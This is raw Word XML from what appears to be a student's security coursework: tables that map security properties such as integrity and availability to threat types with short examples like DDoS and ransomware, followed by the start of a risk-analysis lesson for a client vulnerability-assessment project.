          <w:p w14:paraId="6C0CF92F" w14:textId="62CAC697" w:rsidR="000752C7" w:rsidRPr="00E26FC0" w:rsidRDefault="00523F8D" w:rsidP="00E26FC0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E26FC0">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Access the database.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18317450" w14:textId="77777777" w:rsidR="00523F8D" w:rsidRPr="00E26FC0" w:rsidRDefault="00523F8D" w:rsidP="00E26FC0">
            <w:pPr>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C6F6819" w14:textId="3625CA33" w:rsidR="00523F8D" w:rsidRPr="00CA7170" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000752C7" w:rsidRPr="00CA7170" w14:paraId="5B309396" w14:textId="77777777" w:rsidTr="00DA34CB">
        <w:trPr>
          <w:trHeight w:val="836"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7BC41791" w14:textId="77777777" w:rsidR="000752C7" w:rsidRPr="00CA7170" w:rsidRDefault="000752C7" w:rsidP="00AB52F3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2694" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="2CC9132F" w14:textId="4D7E3B2D"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Exclusiveness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="38F1AF24" w14:textId="2BBE6402" w:rsidR="000752C7"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buse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="2AD8D358" w14:textId="3B68F47B" w:rsidR="000752C7"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Use someone else’s credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28ED3568" w14:textId="0E7C4686" w:rsidR="006D41D6" w:rsidRPr="00CA7170" w:rsidRDefault="006D41D6" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="11199" w:type="dxa"/>
        <w:tblInd w:w="-998" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1560"/>
        <w:gridCol w:w="2694"/>
        <w:gridCol w:w="1842"/>
        <w:gridCol w:w="5103"/>
      </w:tblGrid>
      <w:tr w:rsidR="0021069F" w:rsidRPr="00CA7170" w14:paraId="6C0205E3" w14:textId="77777777" w:rsidTr="00CA7170">
        <w:trPr>
          <w:trHeight w:val="890"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="01355760" w14:textId="526063B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Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2694" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="7665A25D" w14:textId="5AF9CE29"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rrect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="3412B53C" w14:textId="5ACCB9C2"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Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="4CBF8FF2" w14:textId="036CEE27" w:rsidR="00E26FC0" w:rsidRPr="00CA7170" w:rsidRDefault="00E26FC0" w:rsidP="00E26FC0">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21069F" w:rsidRPr="00CA7170" w14:paraId="45219E73" w14:textId="77777777" w:rsidTr="00CA7170">
        <w:trPr>
          <w:trHeight w:val="704"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="24A8C08A"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78EF3756" w14:textId="6D3D780C"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0C2AC9D8" w14:textId="22EEA8A6"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Removal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="608E10A6" w14:textId="6CD907F4"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Dropping the database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0021069F" w:rsidRPr="00CA7170" w14:paraId="6D42D90D" w14:textId="77777777" w:rsidTr="00CA7170">
        <w:trPr>
          <w:trHeight w:val="828"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="35C87C11"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D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="674C6D4B" w14:textId="702A00A3"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mplete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="7A09BD45" w14:textId="6E329807"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ddition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="62AEF6E7" w14:textId="38614BED" w:rsidR="0021069F" w:rsidRPr="00CA7170" w:rsidRDefault="00E26FC0" w:rsidP="00AB52F3">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1D3E71E6" w14:textId="77777777" w:rsidTr="00CA7170">
        <w:trPr>
          <w:trHeight w:val="839"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="388DBF75"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30F6CF89" w14:textId="3D143CD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Valid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="0784810E" w14:textId="1E31821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Out of date</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA7170">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="0157B81A" w14:textId="70B5EAC6"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Changing the database information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005669E8" w:rsidRPr="00CA7170" w14:paraId="16168158" w14:textId="77777777" w:rsidTr="00CA7170">
        <w:trPr>
          <w:trHeight w:val="852"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="7FA43DB9"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5AE0DE40" w14:textId="1D666AE2"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Authentic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="7FBB1F07" w14:textId="212435C8"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Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="48A25152" w14:textId="23D9520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Adding false information to the database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005669E8" w:rsidRPr="00CA7170" w14:paraId="4DAD2F08" w14:textId="77777777" w:rsidTr="00CA7170">
        <w:trPr>
          <w:trHeight w:val="849"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="786CDC8A" w14:textId="77777777" w:rsidR="005669E8" w:rsidRPr="00CA7170" w:rsidRDefault="005669E8" w:rsidP="005669E8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2694" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="03559698" w14:textId="5B265346"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Indisputability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="057EED76" w14:textId="4A22099C" w:rsidR="005669E8" w:rsidRPr="00CA7170" w:rsidRDefault="005669E8" w:rsidP="005669E8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA7170">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Denial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D1CAE0"/>
          </w:tcPr>
          <w:p w14:paraId="716869BB" w14:textId="6B80A9C4" w:rsidR="005669E8" w:rsidRPr="00CA7170" w:rsidRDefault="005669E8" w:rsidP="005669E8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Removing data from database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50AA328F" w14:textId="77777777" w:rsidR="0021069F" w:rsidRPr="00CA7170" w:rsidRDefault="0021069F" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="11199" w:type="dxa"/>
        <w:tblInd w:w="-998" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1560"/>
        <w:gridCol w:w="2694"/>
        <w:gridCol w:w="1842"/>
        <w:gridCol w:w="5103"/>
      </w:tblGrid>
      <w:tr w:rsidR="0021069F" w:rsidRPr="00CA7170" w14:paraId="5A378F97" w14:textId="77777777" w:rsidTr="00CA7170">
        <w:trPr>
          <w:trHeight w:val="822"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3597C422" w14:textId="04BFF23F"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Availability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2694" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1A4C0D64" w14:textId="7CE93CCE"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Well timed</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA7170">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="72AA8247" w14:textId="7FB2E7A0" w:rsidR="0021069F" w:rsidRPr="00CA7170" w:rsidRDefault="0021069F"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elay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1254CC8A" w14:textId="2D5E9F05" w:rsidR="0021069F" w:rsidRPr="00CA7170" w:rsidRDefault="005669E8" w:rsidP="00AB52F3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DDoS attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0021069F" w:rsidRPr="00CA7170" w14:paraId="7EE087F8" w14:textId="77777777" w:rsidTr="00CA7170">
        <w:trPr>
          <w:trHeight w:val="1131"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="208C7C4F" w14:textId="77777777" w:rsidR="0021069F" w:rsidRPr="00CA7170" w:rsidRDefault="0021069F" w:rsidP="00AB52F3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2694" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="48899E1E" w14:textId="411469F3"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Continuity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6283C04F" w14:textId="1A0AE955" w:rsidR="0021069F" w:rsidRPr="00CA7170" w:rsidRDefault="00CA7170" w:rsidP="00AB52F3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA7170">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Downtime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="65BE7358" w14:textId="77777777" w:rsidR="0021069F" w:rsidRDefault="005669E8" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005669E8">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DDoS attack</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7375879D" w14:textId="359215C0" w:rsidR="005669E8" w:rsidRPr="005669E8" w:rsidRDefault="005669E8" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ransomware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7994DDF7" w14:textId="5F144FEE" w:rsidR="006D41D6" w:rsidRDefault="006D41D6" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="294B3966" w14:textId="45E5D306" w:rsidR="006D41D6" w:rsidRDefault="006D41D6" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CDD6646" w14:textId="74A93DC7" w:rsidR="006D41D6" w:rsidRDefault="006D41D6" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB3FDE5" w14:textId="632004BE" w:rsidR="006D41D6" w:rsidRDefault="006D41D6" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A9C6450" w14:textId="1CC12356" w:rsidR="006D41D6" w:rsidRDefault="006D41D6" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22FB5501" w14:textId="0DF20A34" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc114777177"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lesson 1.3 (Risk Analysis)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="197E13DB" w14:textId="14CC7D6C" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F448F1" w14:textId="361F08A0" w:rsidR="00A15DF8" w:rsidRDefault="009D132A" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For the 4</w:t>
      </w:r>
      <w:r w:rsidRPr="009D132A">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> semester project, I will be working with a client to improve their infrastructure security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9AAEA0" w14:textId="3EA66247" w:rsidR="009D132A" w:rsidRDefault="009D132A" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I will aim to find as many vulnerabilities as possible, </w:t>
      </w:r>
      <w:r w:rsidR="00141090">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>then I will advise them how to fix them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101502E1" w14:textId="1C49EBCB" w:rsidR="00141090" w:rsidRDefault="00141090" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In this task, I will show some of the scenarios that might take place against my client, after that, I will rate every scenario how dangerous it is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE77C1F" w14:textId="77777777" w:rsidR="00141090" w:rsidRDefault="00141090" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1842"/>
        <w:gridCol w:w="1908"/>
        <w:gridCol w:w="1816"/>
        <w:gridCol w:w="1889"/>
        <w:gridCol w:w="1561"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F935E5" w14:paraId="0ED02AC4" w14:textId="0FD55B08" w:rsidTr="00F935E5">
        <w:trPr>
          <w:trHeight w:val="700"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A8348BB" w14:textId="62CF2562" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="098A04EE" w14:textId="14716144" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Impact Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EEBCD85" w14:textId="10710273" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Impact Level (1-5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07381D7E" w14:textId="62D7ED90" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
